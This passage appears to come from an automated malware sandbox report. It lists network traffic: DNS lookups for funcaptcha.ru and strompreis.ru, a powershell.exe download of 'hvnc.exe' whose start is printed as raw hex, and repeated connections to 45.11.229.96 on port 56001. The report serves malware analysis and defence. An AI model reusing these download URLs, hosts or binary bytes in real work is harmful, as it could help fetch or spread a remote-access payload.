                        Aug 6, 2024 18:12:11.829147100 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829185963 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829235077 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829236984 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.829248905 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829272032 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.829323053 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829356909 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829370022 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.829380989 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829423904 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.830341101 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.830420017 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.830451012 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.830475092 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.830478907 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.830492973 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.830526114 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.830988884 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.831051111 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.831062078 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.831145048 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.831182003 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.831193924 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.831199884 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.831240892 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.832446098 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.832544088 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.832607985 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.832623959 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.884310007 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.915940046 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916016102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916049004 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916076899 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916099072 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.916107893 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916126013 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916162968 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.916191101 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.916455984 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916517019 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.916832924 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916896105 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.916919947 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.916984081 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.917694092 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.917752981 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.917859077 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.917918921 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.918654919 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.918716908 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.918821096 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.918889999 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.919604063 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.919672966 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.002441883 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002490997 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002525091 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.002594948 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002638102 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.002656937 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002688885 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.002708912 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002732992 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.002770901 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002818108 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.002834082 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.002907038 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.003432989 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.003484011 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.003498077 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.003515959 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.003535986 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.003541946 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.003570080 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.003580093 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.003607035 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.004678011 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.004750967 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.004770994 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.004889011 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005060911 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005119085 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005266905 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005321980 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005328894 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005345106 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005373001 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005398035 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005435944 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005443096 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005450964 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005477905 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.006037951 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006084919 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.006094933 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006122112 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006151915 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.006159067 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006172895 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.007675886 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.007731915 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.007745028 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.008002043 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.008579969 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.008655071 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.008862972 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.008924961 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.009691954 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.009778023 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.010819912 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.010907888 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.010957956 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.010965109 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.010996103 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.011055946 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.011121988 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.011128902 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.011188030 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.090806007 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090876102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090923071 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090922117 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.090941906 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090985060 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.090996981 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091051102 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091062069 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091079950 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091120958 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091126919 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091140985 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091167927 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091187954 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091188908 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091207027 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091237068 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091262102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091314077 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091320992 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091425896 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091466904 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091475010 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091533899 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091578007 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091583967 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091681957 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091732979 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091738939 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092197895 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092221022 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092257023 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.092262983 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092303991 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.095922947 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.095953941 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.095994949 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096002102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096038103 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096380949 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096406937 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096447945 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096452951 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096467972 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096491098 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096507072 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096510887 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096545935 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096550941 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096580982 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096621990 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.176649094 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.176680088 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.176748037 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.176772118 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.176821947 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.176843882 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.179595947 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.179619074 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.179702044 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.179717064 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.179761887 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180022955 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180053949 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180126905 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180134058 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180250883 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180411100 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180429935 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180490971 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180497885 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180725098 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180785894 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180802107 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180849075 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180855036 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180921078 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180941105 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180947065 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180954933 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180989981 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181015968 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181030989 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181041956 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181050062 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181123018 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181389093 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181406975 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181461096 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181466103 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181520939 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.262851954 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.262897968 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.262984991 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.262999058 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.263024092 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.263058901 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.263062000 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.263103962 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.289619923 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:14.982495070 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:14.987843990 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:14.987998009 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:14.990932941 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:14.996669054 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:15.013216972 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:15.018275023 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:36.381768942 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:36.381881952 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.901627064 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.902767897 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.907437086 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:37.908382893 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:37.908454895 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.908538103 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.915512085 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:37.915579081 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.921113014 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:59.281466007 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:59.281755924 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.790843010 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.791763067 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.795839071 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:00.796595097 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:00.796670914 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.796731949 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.801636934 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:00.801726103 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.808163881 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:22.196912050 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:22.196985960 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.712608099 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.713640928 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.840663910 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:23.840723991 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:23.840848923 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.841659069 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.847712994 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:23.847784042 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.853234053 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:45.234520912 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:45.234606981 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.743974924 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.744910002 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.749059916 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:46.750310898 CEST560014971645.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:46.750380993 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.750430107 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.755719900 CEST560014971645.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:46.755779982 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.760905981 CEST560014971645.11.229.96192.168.2.5

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 6, 2024 18:12:10.306605101 CEST6279153192.168.2.51.1.1.1
                        Aug 6, 2024 18:12:10.895558119 CEST53627911.1.1.1192.168.2.5
                        Aug 6, 2024 18:12:14.848717928 CEST5851453192.168.2.51.1.1.1
                        Aug 6, 2024 18:12:14.979787111 CEST53585141.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Aug 6, 2024 18:12:10.306605101 CEST192.168.2.51.1.1.10xdbaeStandard query (0)funcaptcha.ruA (IP address)IN (0x0001)false
                        Aug 6, 2024 18:12:14.848717928 CEST192.168.2.51.1.1.10x7a00Standard query (0)strompreis.ruA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Aug 6, 2024 18:12:10.895558119 CEST1.1.1.1192.168.2.50xdbaeNo error (0)funcaptcha.ru188.114.96.3A (IP address)IN (0x0001)false
                        Aug 6, 2024 18:12:10.895558119 CEST1.1.1.1192.168.2.50xdbaeNo error (0)funcaptcha.ru188.114.97.3A (IP address)IN (0x0001)false
                        Aug 6, 2024 18:12:14.979787111 CEST1.1.1.1192.168.2.50x7a00No error (0)strompreis.ru45.11.229.96A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • funcaptcha.ru

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704188.114.96.34432284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-08-06 16:12:11 UTC71OUTGET /hvnc.exe HTTP/1.1
                        Host: funcaptcha.ru
                        Connection: Keep-Alive
                        2024-08-06 16:12:11 UTC758INHTTP/1.1 200 OK
                        Date: Tue, 06 Aug 2024 16:12:11 GMT
                        Content-Type: application/x-msdos-program
                        Content-Length: 449024
                        Connection: close
                        Cache-Control: max-age=14400
                        content-disposition: inline; filename=hvnc.exe
                        etag: "1712326391.8143692-449024-1471809545"
                        last-modified: Fri, 05 Apr 2024 14:13:11 GMT
                        CF-Cache-Status: MISS
                        Accept-Ranges: bytes
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2uVCVEk6nXWiAaNCX5P%2BUnrLVn%2FCheWfnJwamKlJ0nW0xq9xYgkrWcYaeV8dn5IiBXG4V%2FzSNDp7LfFnn7TNCB8emSk9H7H9fl0yCH0CI3%2B2SrksR9eaEjiXerX7CY3"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8af04e9bad1c2363-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-06 16:12:11 UTC611INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac a2 de e4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 d0 06 00 00 08 00 00 00 00 00 00 f2 2b 00 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0+ @ @@
                        2024-08-06 16:12:11 UTC1369INData Raw: 11 00 00 0a 2a 13 30 03 00 37 00 00 00 01 00 00 11 28 02 00 00 06 74 18 00 00 01 72 01 00 00 70 6f 12 00 00 0a 0a d0 19 00 00 01 28 13 00 00 0a 06 72 4d 00 00 70 28 14 00 00 0a 16 8d 10 00 00 01 6f 15 00 00 0a 26 2a 00 1b 30 04 00 7c 00 00 00 02 00 00 11 73 16 00 00 0a 0a 28 05 00 00 06 73 17 00 00 0a 0b 7e 01 00 00 04 8d 1c 00 00 01 0c 07 08 16 7e 01 00 00 04 6f 18 00 00 0a 26 08 16 28 19 00 00 0a 26 07 16 73 1a 00 00 0a 0d 09 06 6f 1b 00 00 0a 06 6f 1c 00 00 0a 13 04 11 04 16 11 04 8e 69 28 1d 00 00 0a 11 04 13 05 de 1e 09 2c 06 09 6f 1e 00 00 0a dc 07 2c 06 07 6f 1e 00 00 0a dc 06 2c 06 06 6f 1e 00 00 0a dc 11 05 2a 01 28 00 00 02 00 3a 00 21 5b 00 0a 00 00 00 00 02 00 11 00 54 65 00 0a 00 00 00 00 02 00 06 00 69 6f 00 0a 00 00 00 00 5a 20 1f c2 06 00
                        Data Ascii: *07(trpo(rMp(o&*0|s(s~~o&(&sooi(,o,o,o*(:![TeioZ
                        2024-08-06 16:12:11 UTC1369INData Raw: 30 37 33 46 37 36 35 33 31 46 38 43 44 30 35 44 46 41 00 53 79 73 74 65 6d 2e 49 4f 00 6d 73 63 6f 72 6c 69 62 00 52 65 61 64 00 54 68 72 65 61 64 00 4c 6f 61 64 00 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 00 44 79 6e 61 6d 69 63 49 6e 76 6f 6b 65 00 49 44 69 73 70 6f 73 61 62 6c 65 00 52 75 6e 74 69 6d 65 46 69 65 6c 64 48 61 6e 64 6c 65 00 52 75 6e 74 69 6d 65 54 79 70 65 48 61 6e 64 6c 65 00 47 65 74 54 79 70 65 46 72 6f 6d 48 61 6e 64 6c 65 00 56 61 6c 75 65 54 79 70 65 00 47 65 74 54 79 70 65 00 44 69 73 70 6f 73 65 00 52 65 76 65 72 73 65 00 43 72 65 61 74 65 44 65 6c 65 67 61 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74
